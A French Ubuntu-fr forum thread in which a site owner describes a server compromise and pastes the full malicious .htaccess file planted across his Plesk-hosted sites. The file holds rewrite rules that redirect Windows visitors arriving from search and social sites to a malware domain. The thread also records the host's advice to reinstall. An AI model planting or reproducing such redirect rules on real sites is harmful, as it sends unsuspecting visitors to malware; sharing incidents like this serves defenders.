Ubuntu-fr

BMF

Re : Attaque par .htaccess

Intéressante la lecture de ce thread

---

Ubuntu 18.04 sur Thinkpad T430 et X230

damien1908

Re : Attaque par .htaccess

J'ai subit hier ce genre d'attaque.

Je possède la config suivante :

Version de Parallels Plesk Panel 9.5.2
Système d'exploitation Linux 2.6.25.4dedibox-r9-smp-x32

Je me suis retrouvé d'un moment à l'autre avec une propagation de fichiers .htacces dans tous les dossiers de tous les sites que Plesk gère.

De la racine au dossier le plus profond (pas dans tous non plus mais dans 75% des dossiers existant).

Ce fichier .htaccess redirige le visiteurs du site vers un virus.

Une fois le fichier supprimé tout rentre dans l'ordre. Sauf que certains fichiers ceux basé à la racine de la racine (au même niveau que le dossier httpdocs) sont insuprimmable (chmod 664, utilisateur root) par FTP.

Voici ce que contient le fichier .htaccess :

ErrorDocument 500 http://vir.deepriversnackshack.info/mai … ==&e=0
ErrorDocument 502 http://vir.deepriversnackshack.info/mai … ==&e=2
ErrorDocument 403 http://vir.deepriversnackshack.info/mai … ==&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://vir.deepriversnackshack.info/mai … ==&e=r [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://vir.deepriversnackshack.info/mai … ==&e=4 [R,L]

J'ai ouvert une discussion ici pour tenter de trouver des solutions et des réponses :

>> http://www.dedibox-news.com/viewtopic.php?pid=61668

J'ai contacter le support technique de Dedibox (Online.net maintenant). J'attend leur réponse.

damien1908

Re : Attaque par .htaccess

Le support technique de Dedibox (toujours aussi aigri) m'a simplement répondu :

"Votre Dedibox est à ré-installer, faite le nécessaire".

OKKKK!!!  =>

La solution, la plus sage qu'elle soit, a été de faire appel à un info-gérant. Ces derniers s'occupe à présent de tout.